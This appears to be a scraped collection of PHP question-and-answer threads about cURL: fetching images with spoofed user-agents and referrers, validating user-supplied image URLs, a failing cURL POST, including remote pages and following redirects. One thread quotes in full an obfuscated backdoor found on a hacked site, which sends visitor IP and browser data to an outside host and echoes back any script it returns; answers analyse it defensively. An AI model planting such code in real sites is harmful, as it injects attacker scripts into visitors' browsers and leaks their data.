I am writing a code in PHP which fetches the content in a particular format from around 20 websites.
It is working normally for all the websites except one. Now, here is the issue.
I am using file_get_contents() to fetch images from the website and save it on my server. The image is present on the remote server and is accessible via browser but I am getting 404 response while doing it via code.
I am unable to understand the issue behind this as this method works perfectly for other websites.
Has it something to do with the headers being sent? Any help will be greatly appreciated.
The answer is probably: yes...
They're checking user-agents, I suppose.
And those are sent in your headers. You can fake your user-agent. Don't use file_get_contents() though, as that one doens't allow faking your user-agent.
Look into curl.
Edit 1
Barmar's link shows a possibility to use file_get_contents() with a different user-agent at the same time. It's worth while looking into...
Edit 2
But it could also be about then checking the referrer... If that is the case you really need to use curl to be able to set the referrer.
Edit 3
Having seen the URL now, and looking at error 404 that you get (not a 50x) , I advise you to check if the URL is being escaped and parsed ok. I see that the URL contains spaces, and two slashes after the domain name. Check if spaces are escaped into %20 and if the double slashed shouldn't be stripped to just one slash.
So
http://celebslam.celebuzz.com//bfm_gallery/2014/03/Lindsay Lohan 2 Broke Girls/gallery_enlarged/gallery_enlarged-lindsay-lohan-2-broke-girls-01.jpg
Should become
http://celebslam.celebuzz.com/bfm_gallery/2014/03/Lindsay%20Lohan%202%20Broke%20Girls/gallery_enlarged/gallery_enlarged-lindsay-lohan-2-broke-girls-01.jpg
And notice, the server is CaSe-SeNsItIvE !
Yep, first of all - check, if that site check referrer on images access. For example try to get image directly in browser
It also can check user-agent field and something else
Probably it will help to get file by curl ( code examples easy to find or i'll give you simple class )
P.S> just interesting. Can you give some images url examples to try?
Probably the referral or user agent. This includes both:
function file_get_contents_custom($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_REFERER, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION , 1);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7');
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
Update:
The image you linked works fine for me using file_get_contents. It might be that the server has some sort of DDOS protection. How many requests are you making a second on average?
Related
I want to allow users to upload urls for images (a bit like on this site in the markup). The only difference is that I'm going to store these in my database. I want to ensure nothing too malicious can be done.
After looking around I've seen the recommendation of cURL to check for the content_type as apparently getimagesize() actually downloads the full image, which not only has security implications (apparently - I'm really not an expert) but will therefore be slow.
So far my code is looking like this:
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL,$url);
// don't download content
curl_setopt($curl, CURLOPT_NOBODY, 1);
curl_setopt($curl, CURLOPT_FAILONERROR, 1);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
if(curl_exec($curl)===FALSE)
{
curl_close($curl);
return false;
}
$contentType = curl_getinfo($curl, CURLINFO_CONTENT_TYPE); //get content type
curl_close( $curl );
if (strpos($contentType, 'image')){
// valid image
}
However, I'm not entirely sure if this is the correct way to go about doing this. I've also seen lots about sanitising the urls, but not entirely sure what this would entail.
Any help on securing this part of my web app and preparing it for storage would be highly appreciated.
As a quick aside, I'm hoping to do the same for YouTube links so if you have any recommendations for that, I'd appreciate it - though I've not begun research into this yet.
Regards,
Mike
You can also escape special chars and what not using the function below
<?php
$url = htmlspecialchars(addslashes($_POST["inputName"]));
?>
This will add splashes and turn & signs to html entities https://www.w3schools.com/html/html_entities.asp instead so you might need to reverse this process when reading the data from the database.
If you're going to allow users to upload a file by URL, start by downloading the file (either by using cURL, or any other tools you like). Don't bother making an initial request to check the Content-Type -- what matters is ultimately the content of the file, not the headers it happens to served with by the original server.
Once you've downloaded the image, perform any further checks on the local file. Make sure it is an appropriate format, and is not too large, then convert it to your preferred format.
Other notes:
Don't use a fake User-Agent. Use an accurate one which represents what web site is responsible for the request, e.g. "MySite/1.0 http://example.com/". (Other webmasters will thank you for this!)
It's a good idea to do a DNS lookup on the domain before requesting it, to protect your server from DNS rebinding attacks. Make sure that the resulting IP does not point to your private network, or to localhost, before you make an HTTP request.
Recently a website I have been involved with was hacked with unauthorised code being placed on a number of pages. I was just wondering if anyone could shed any light onto what exactly this code does, and what benefit it would be to the user who placed it on these pages.
<?php
#31e3cd#
error_reporting(0); ini_set('display_errors',0); $wp_okpbo35639 = #$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_okpbo35639) && !preg_match ('/bot/i', $wp_okpbo35639))){
$wp_okpbo0935639="http://"."html"."-href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_okpbo35639);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_okpbo0935639);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_35639okpbo = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_35639okpbo,1,3) === 'scr' ){ echo $wp_35639okpbo; }
#/31e3cd#
?>
Above is the code, as it appeared on the pages. I have played around with this code and it seems to get user information using:
$_SERVER['HTTP_USER_AGENT']
It is then combined into a url similar to the one below, but with the user information from above added to the url
http://html-href.com/href/?ip=::1&referer=localhost&ua=
I know curl is used in the transfer of data but where exactly is this information getting sent and what is its purpose?
The code makes a call to the URL you noted, sending along the user's IP, your site's domain, and the user's useragent string. It's then printing onto your site any code it receives from the cURL request. The code received could be anything. It could be HTML, JavaScript, or any other client side code. It's probably not server-side code since there's no eval() running the code received.
It appears to target Internet Explorer, Chrome, and FireFox browsers, but not crawlers/bots.
EDIT: As FDL pointed out in his comment, this appears to be printing only if it receives a string where the second, third, and fourth characters are scr, meaning it likely only prints to the page if it received a <script> tag.
$_SERVER['HTTP_USER_AGENT'] is used to check the kind of web browser (or can be a crawler) from which the client requests the resource based on the URL. For instance with this snippet preg_match ('/Gecko|MSIE/i', $wp_okpbo35639), it is used to check if the client browser is Firefox(Gecko) or IE(MSIE). But this is not a foolproof way to determine the source browser as user-agents can easily be changed or switched.
I have the same code running on multiple sites/servers. 2 days ago the code started returning http_code = 0 and the error message "empty reply from server" on one of the servers.
Can anyone shed any light as to why a particular server would be working one day, then not working the next? I have submitted a ticket to the ISP explaining the issue but they cannot seem to find what is wrong (yet).
I guess the question really is, what would/could change on a server to stop this from working?
What is interesting tho is the url I am referencing doesnt get touched on the server returning the error. If I change the url to point to something that doesnt exist, the same error is returned. So it appears that CURL POST references in total are being rejected by the server. I currently have other CURL scripts that are hitting these problem sites that are still working, but they do not have POST options in them.
The issue is definitely related to CURL POST requests on this server, and they are being rejected pretty much immediately.
On the server in question I have 15+ separate accounts and every one of them returns the same result so I dont think its anything I have changed as I know I havent made any wholesale changes to ALL the sites at the time when this issue arose. Of the 6 other sites I have hosted elsewhere, everything is still working fine with exactly the same code.
I have tried various combinations/changes to options from posts I have read but nothing has really made a difference, the working sites still work and the non-working sites still dont.
function sendWSRequest($url, $xml) {
// $headers[] = 'Content-Type: application/xml; charset=utf-8';
$headers[] = 'Content-Type: text/xml; charset=utf-8';
$headers[] = 'Content-Length: ' . strlen($xml);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_HEADER, true);
// curl_setopt($ch, CURLINFO_HEADER_OUT, false);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_POSTFIELDS, $xml);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
// curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);
$result = curl_exec($ch);
if($result===false) {
print 'error with curl - '.curl_error($ch).'<br />';
}
$info = curl_getinfo($ch);
curl_close($ch);
return $result;
}
Any help would be greatly appreciated.
EDIT
To summarise based on further investigations, when the script errors, nothing registers in the server access logs. So it appears that CURL requests containing POST options are being rejected before access is granted/logged...
Cheers
Greg J
I know this is an old thread, but I found a solution that may save someone else a headache:
I just began encountering this exact problem with a web site hosted at GoDaddy which was working until recently. To investigate the problem I created an HTML page with a form containing the same fields being submitted in the POST data via cURL.
The browser-submitted HTML form worked while the cURL POST resulted in the Empty reply from server error. So I examined the difference between the headers submitted by the browser and those submitted by cURL using the PHP apache_request_headers() function on my development system where both the cURL and browser submissions worked.
As soon as I added the "User-Agent" header submitted by my browser to the cURL POST, the problem site worked as expected instead of returning an empty reply:
CURLOPT_HTTPHEADER =>
array("User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0")
I did not experiment with other/simpler User-Agent headers since this quick fix solved my problem.
According to the PHP manual, upload should be urlencoded:
CURLOPT_POSTFIELDS The full data to post in a HTTP "POST" operation.
[...] This parameter can either be
passed as a urlencoded string like 'para1=val1¶2=val2&...' or as
an array with the field name as key and field data as value. If value
is an array, the Content-Type header will be set to
multipart/form-data. As of PHP 5.2.0, value must be an array if files
are passed to this option with the # prefix. As of PHP 5.5.0, the #
prefix is deprecated and files can be sent using CURLFile.
So you might try with
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'xml=' . urlencode($xml));
and see what happens. Or, anyway, start with an empty or very simple FIELD to see if it at least arrives to the destination server.
Update
I've checked this setup on a test machine and it works. The problem is then likely not to be PHP or cURL side at all, at this point. Can you request a list of software/hardware updates on that machine and network in the last days?
Otherwise, I'd try to capture outgoing traffic so as to determine whether the request leaves the server (and the problem is in between, e.g. a misconfigured firewall: hence my inclusion of "hardware" in the change list), or doesn't leave the server at all. In this latter case the culprits could be:
updates to cURL library
updates to PHP cURL module and/or PHP binaries
updates to "software" firewall rules
updates to ancillary network libraries (unlikely; they should be HTTP agnostic and not differentiate a POST from, say, a GET or HEAD)
OK, as it turns out, a rather reluctant host recompiled Apache2 and PHP which has resolved the issue.
The host claims (their opening statement to my support ticket) that no updates to either Apache2 or PHP had been performed around the time the issue occurred.
the behavior was as such that it wasnt even acknowledging a CURL request that contained the POST commands. The target URL was never reached.
Thank you so much to all who provided their advice. Particularly Isemi who has gone to great lengths to find a resolution.
I need to include some URL in php..
I used the following code:
<? include 'http://my_server.com/some_page.jsp?test=true'; ?>
The problem is that, the page some_page.jsp act differentially based on the request headeruser-agent that appears not being sent by the above include statement...
So How can I force the browser to send the request headers too to the included page?
Thanks.
That is a bad pattern to use, if it is on your own server, you should just include it via a relative path (why invoke HTTP) and if it isn't, you are basically handing the keys to your site over to the other domain.
To request another document with a different user agent, try the cURL library.
Do not continue, for informative purposes only...
If you must run the resulting PHP code (and I strongly advise you don't, and most importantly why?) you can then eval() the response.
Update
You need allow_url_include on to include a URL, and it is off by default. If you enable it, you can then set the user agent with the user_agent option.
If you are doing this to join a php and jsp site together, you should try and stick to only sending data between them, not code for the other to run over HTTP.
The statement:
<? include 'http://my_server.com/some_page.jsp?test=true'; ?>
is not going to act as you expected.
Check-out: HttpClient
http://scripts.incutio.com/httpclient/
There are user manual and example
You can't set all the HTTP headers that are sent, but you can set the user-agent string that is sent like so:
<?
ini_set("user_agent", $_SERVER["HTTP_USER_AGENT"]);
include 'http://my_server.com/some_page.jsp?test=true';
?>
The user_agent value is NULL by default, which is why you don't currently see anything being sent.
That should do the trick. Note that if the .jsp file returns html content rather than php, you should use readfile, not include.
I'd highly advise you not to use your code in a live environment, ever. Instead, use Client-URL.
For example, you can do it like this:
$ch = curl_init();
// the website
curl_setopt($ch, CURLOPT_URL, 'http://www.example.com/path/to/webpage');
// this line sets up curl so the website contents will be returned
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// the user agent, for example firefox
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 GTB5');
$html = curl_exec($ch);
If you absolutely need to execute the code afterwards, then you can perform a lot of checking and eval() it, but only if you have to. A better approach would be some kind of dictionary.
I know that using cURL i can see the destination URL, pointing cURL to URL having CURLOPT_FOLLOWLOCATION = true.
Example :
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "www.example1.com");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$result = curl_exec($ch);
$info = curl_getinfo($ch); //Some information on the fetch
curl_close($ch);
$info will have the url of the final destination which can be www.example2.com.
I hope my above understanding is correct. Please let me know if not!.
My main question is, what all type of redirection cURL will be able to know?
Apache redirect, javascript redirects, form submition redirects, meta-refresh redirects!?
update
Thanks for your answeres #ceejayoz and #Josso. So is there a way by which I can follow all the redirect programatically through php?
cURL will not follow JS or meta tag redirects.
I know this answer is a little late, but I ran into a similar issue and needed more than just following the HTTP 301/302 status redirects. So I wrote a small library that will also follow rel=canonical and og:url meta tags.
https://github.com/mattwright/URLResolver.php
I found meta refresh tags to not provide much benefit, but they are used if no head or body html tag is returned.
As far as I know, it only follows HTTP Header redirects. (301 and 302).
curl is a multi-protocol library, which provides just a little HTTP support but not much more that will help in your case. You could manually scan for the meta refresh tag as workaround.
But a better idea was to check out PEAR HTTP_Request or the Zend_Http class, which more likely already provide something like this. Also phpQuery might be relevant, as it comes with its own http functions, but could easily ->find("meta[refresh]") if there's a need. Or look for a Mechanize-like browser class: Is there a PHP equivalent of Perl's WWW::Mechanize?
I just found this on the php site. It parses the response to find redirects and follows them. I don't think it gets every type of redirect, but it's pretty close
http://www.php.net/manual/en/ref.curl.php#93163
I'd copy it here but I don't want to plagiarize